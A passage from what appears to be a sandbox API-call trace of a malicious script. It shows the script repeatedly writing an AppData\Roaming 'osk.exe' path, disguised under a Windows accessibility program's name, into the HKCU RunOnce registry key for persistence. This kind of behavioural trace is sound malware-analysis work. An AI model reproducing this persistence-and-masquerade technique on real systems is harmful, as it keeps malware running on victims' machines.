[4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0080.222] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x6d [0080.222] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0080.223] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x6c [0080.223] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.223] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0080.223] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.223] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.223] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0080.223] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0080.223] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0080.223] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0080.224] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0080.224] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0080.224] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0080.224] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0080.224] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0080.224] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0080.224] RegCloseKey (hKey=0x280) returned 0x0 [0080.224] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.224] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.224] SetTimer (hWnd=0x20280, nIDEvent=0x206c, uElapse=0xa, lpTimerFunc=0x0) returned 0x206c [0080.224] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0080.236] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0080.236] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0080.236] KillTimer (hWnd=0x20280, uIDEvent=0x206c) returned 1 [0080.237] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.237] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0080.237] IUnknown:Release (This=0x787518) returned 0x1 [0080.237] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0080.237] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0080.237] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0080.237] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0080.237] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0080.237] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0080.238] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0080.238] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0080.238] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0080.238] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x6d [0080.238] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0080.238] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x6e [0080.238] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0080.239] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x6d [0080.239] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.239] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0080.239] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.239] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.239] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0080.239] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0080.239] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0080.239] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0080.239] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0080.239] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0080.240] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0080.240] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0080.240] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0080.240] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0080.240] RegCloseKey (hKey=0x280) returned 0x0 [0080.240] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.240] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.240] SetTimer (hWnd=0x20280, nIDEvent=0x206d, uElapse=0xa, lpTimerFunc=0x0) returned 0x206d [0080.240] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0080.254] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0080.254] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0080.254] KillTimer (hWnd=0x20280, uIDEvent=0x206d) returned 1 [0080.254] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.254] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0080.255] IUnknown:Release (This=0x787518) returned 0x1 [0080.255] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0080.255] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0080.255] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0080.255] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0080.255] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0080.255] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0080.255] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0080.255] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0080.255] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0080.255] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x6e [0080.256] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0080.256] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x6f [0080.256] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0080.256] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x6e [0080.257] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.257] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0080.257] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.257] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.257] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0080.257] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0080.257] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0080.257] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0080.257] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0080.257] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0080.257] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0080.257] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0080.257] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0080.257] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0080.258] RegCloseKey (hKey=0x280) returned 0x0 [0080.258] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.258] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.258] SetTimer (hWnd=0x20280, nIDEvent=0x206e, uElapse=0xa, lpTimerFunc=0x0) returned 0x206e [0080.258] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0080.268] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0080.268] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0080.268] KillTimer (hWnd=0x20280, uIDEvent=0x206e) returned 1 [0080.268] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.268] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0080.268] IUnknown:Release (This=0x787518) returned 0x1 [0080.269] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0080.269] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0080.269] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0080.269] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0080.269] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0080.269] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0080.269] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0080.269] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0080.269] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, 